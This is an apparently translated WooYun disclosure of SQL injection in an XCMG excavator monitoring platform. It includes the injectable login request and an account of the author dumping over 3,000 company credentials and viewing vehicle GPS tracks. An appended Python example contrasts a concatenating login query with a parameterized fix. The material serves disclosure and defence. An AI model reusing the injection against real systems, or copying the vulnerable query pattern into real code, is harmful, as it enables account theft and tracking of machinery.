
Vulnerability summary

Defect ID: wooyun-2015-0138947

Title: SQL injection in an excavator monitoring platform leaks excavator data of more than 3,000 companies (accounts, terminal information, real-time vehicle location, historical tracks and more)

Vendor: XCMG (徐工集团)

Author: Xmyth_夏洛克

Submitted: 2015-09-06 13:51

Fixed: 2015-10-23 19:46

Published: 2015-10-23 19:46

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-06: Details sent to the vendor; awaiting the vendor's response
2015-09-08: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the notifying agency
2015-09-18: Details disclosed to core white hats and domain experts
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public

Brief description:

SQL injection in an excavator monitoring platform leaks excavator data of more than 3,000 companies (accounts, terminal information, real-time vehicle location, historical tracks and more). No need to go to Lanxiang this time!

Detailed description:

1. Control platform page URL:
http://**.**.**.**/pmvm5/logon.asp

[Screenshot: login page]


As the screenshot above shows, the username field is injectable:

POST /pmvm5/userLogin/LoginCheck.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/pmvm5/logon.asp
Cookie: ASPSESSIONIDCQTDBRCD=IPGJEBAAEKOJJCONJIONGIKK
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

EOSOperator%2FuserID=123&TMPEOSOperator%2FuserID=&TMPEOSOperator%2Fpassword=&hciPasswordTypeEOSOperator%2Fpassword=1234&Image1.x=20&Image1.y=2


The EOSOperator%2FuserID parameter is injectable; 18 databases are reachable.

[Screenshot: 18 databases]


The current database has more than 600 tables:

Database: YC2
[638 tables]


The USERINFO table holds account names and passwords for more than 3,700 companies.

[Screenshot: 3,700 company records]


[Screenshot: account names and passwords]

Proof of vulnerability:

2. Log in with any one of the accounts.

[Screenshot: XCMG account]


This company has quite a few excavators...
Terminal information, including machine passwords:

[Screenshot: terminal information]


GPS positioning:

[Screenshot: GPS positioning]


Exact coordinates and historical tracks can be viewed:

[Screenshot: historical track]


Lanxiang students could probably go over and drive them away... The other information is too specialised for me to understand, so I didn't test it.

Fix recommendation:

Filter the input.
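As an added illustration (not code from the original report or from the platform), here is the defect class behind this finding and its standard fix: a login check that concatenates the submitted user ID into the SQL text, beside the same check using bound parameters. SQLite is used as a stand-in for the platform's database, the USERINFO column names USERID, PASSWORD and UNITNAME are assumed, and the rows are constructed; the probe at the end is a regression test a defender can keep in a test suite to flag the concatenating variant.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the platform's USERINFO table (column names assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE USERINFO (USERID TEXT PRIMARY KEY, PASSWORD TEXT, UNITNAME TEXT)"
    )
    conn.executemany(
        "INSERT INTO USERINFO VALUES (?, ?, ?)",
        [("op01", "s3cret", "Example Dealer A"), ("op02", "hunter2", "Example Dealer B")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, user_id: str, password: str):
    """Concatenates the submitted user ID into the SQL text, so a quote in the
    field changes the query itself; this is the defect class the report describes."""
    sql = (
        "SELECT UNITNAME FROM USERINFO WHERE USERID = '" + user_id
        + "' AND PASSWORD = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, user_id: str, password: str):
    """Bound parameters: the driver passes the values separately from the query
    text, so a quote in user_id can only ever be compared against USERID."""
    row = conn.execute(
        "SELECT UNITNAME FROM USERINFO WHERE USERID = ? AND PASSWORD = ?",
        (user_id, password),
    ).fetchone()
    return row[0] if row else None


def quote_breaks_query(login_fn, conn: sqlite3.Connection) -> bool:
    """Regression probe for a test suite: a user ID containing a single quote must
    never alter the SQL. Returns True if the login routine fails to parse its query."""
    try:
        login_fn(conn, "12'3", "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable variant injectable:", quote_breaks_query(login_vulnerable, db))
    print("fixed variant injectable:", quote_breaks_query(login_fixed, db))
```

Bound parameters remove the root cause; character filtering alone, as the one-word fix above suggests, is fragile and tends to either miss encodings or reject legitimate input.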

Copyright notice: when reposting, please credit Xmyth_夏洛克@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed: 2015-09-08 19:44

Vendor reply:

CNVD has confirmed the described situation; it has been passed via CNCERT to the Jiangsu branch centre, which will coordinate handling with the website's operating unit.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-09-04 13:53 | prolog (Regular white hat | Rank: 567 Vulnerabilities: 108 | keeping a low profile and growing)

    =_= hacking my beloved Lanxiang

  2. 2015-09-04 13:55 | Xmyth_夏洛克 (Regular white hat | Rank: 1083 Vulnerabilities: 121 | can't do anything)

    @xsser The vendor should be 天泽信息 (Tianze Information)

  3. 2015-09-04 22:12 | 牛 小 帅 (Regular white hat | Rank: 483 Vulnerabilities: 117 | Once the tea has gone cold, don't top it up; even topped up it won't taste the same...)

    @Xmyth_夏洛克 haha, please teach me the excavator network-cutoff technique